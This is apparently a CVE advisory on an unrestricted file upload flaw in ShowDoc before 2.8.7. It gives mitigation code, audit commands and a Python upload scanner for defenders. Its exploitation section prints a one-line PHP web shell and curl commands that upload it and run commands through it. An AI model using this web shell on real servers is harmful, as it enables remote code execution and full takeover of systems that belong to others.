How the CVE Works
The vulnerability in ShowDoc before version 2.8.7 arises from insufficient validation of file extensions during uploads. Attackers can bypass security checks by uploading malicious PHP files disguised with allowed extensions (e.g., `.jpg.php`). Once uploaded, these files can be executed on the server, enabling remote code execution (RCE). The lack of proper sanitization in the file upload handler allows attackers to take full control of the affected system.
DailyCVE Form:
Platform: ShowDoc
Version: < 2.8.7
Vulnerability: Unrestricted file upload
Severity: Critical
Date: Apr 29, 2025
What Undercode Say:
Exploitation:
1. Craft a malicious PHP file (e.g., `shell.php`):
<?php system($_GET['cmd']); ?>
2. Upload it via ShowDoc’s file upload endpoint:
curl -F "[email protected]" http://target/showdoc/upload.php
3. Execute commands via the uploaded shell:
curl http://target/uploads/shell.php?cmd=id
Detection:
Check for vulnerable versions:
grep -r "ShowDoc Version" /var/www/html/
Mitigation:
1. Update to ShowDoc 2.8.7 or later.
2. Implement file extension whitelisting:
$allowed = ['jpg', 'png'];
// Compare the final extension case-insensitively and with strict matching
$ext = strtolower(pathinfo($_FILES['file']['name'], PATHINFO_EXTENSION));
if (!in_array($ext, $allowed, true)) { die("Invalid file"); }
3. Disable PHP execution in upload directories via .htaccess:
<Files "*.php">
    Deny from all
</Files>
Additional Checks:
- Audit existing uploads for suspicious files:
find /var/www/html/uploads -name "*.php"
- Monitor server logs for upload attempts:
tail -f /var/log/apache2/access.log | grep "upload.php"
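The `find` audit in the checks above looks only at file names. The following Python script is an added example, not code from the original report or from ShowDoc: it widens the audit to flag a PHP extension in any position of the name (the `.jpg.php` case) and PHP open tags inside files that carry an allowed extension. The extension list, the function names and the sample files are assumptions constructed for the example.

```python
import os
import tempfile

# Assumption: extensions a server may map to the PHP handler; match your own config.
PHP_EXTS = {"php", "php3", "php4", "php5", "php7", "phtml", "pht", "phar"}

def audit_upload(path, scan_bytes=65536):
    """Return the reasons an uploaded file looks like executable PHP (empty if none)."""
    reasons = []
    # Test every dot-separated segment, not only the last one, so that
    # avatar.jpg.php and avatar.php.jpg are both reported.
    segments = os.path.basename(path).lower().split(".")[1:]
    hits = sorted(set(segments) & PHP_EXTS)
    if hits:
        reasons.append("php extension in name: " + ",".join(hits))
    # An allowed extension says nothing about content: look for a PHP open tag.
    with open(path, "rb") as fh:
        if b"<?php" in fh.read(scan_bytes).lower():
            reasons.append("php open tag in content")
    return reasons

def audit_tree(root):
    """Walk the upload directory and map relative path -> reasons for flagged files."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            full = os.path.join(dirpath, fname)
            reasons = audit_upload(full)
            if reasons:
                findings[os.path.relpath(full, root)] = reasons
    return findings

def demo():
    """Run the audit over constructed sample files in a temporary directory."""
    samples = {
        "photo.jpg": b"\xff\xd8\xff\xe0 constructed image bytes",
        "avatar.jpg.php": b"\xff\xd8\xff\xe0 constructed image bytes",
        "logo.png": b"\x89PNG\r\n\x1a\n<?php echo 1; ?>",
        "notes.txt": b"constructed plain text",
    }
    with tempfile.TemporaryDirectory() as root:
        for name, data in samples.items():
            with open(os.path.join(root, name), "wb") as fh:
                fh.write(data)
        return audit_tree(root)

if __name__ == "__main__":
    for path, reasons in sorted(demo().items()):
        print(path, "->", "; ".join(reasons))
```

To audit a real installation, call `audit_tree` on the upload directory; only the first 64 KiB of each file is scanned, so raise `scan_bytes` for large files.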
Patch Reference:
Apply the official fix from ShowDoc’s GitHub repository.
Sources:
Reported By: github.com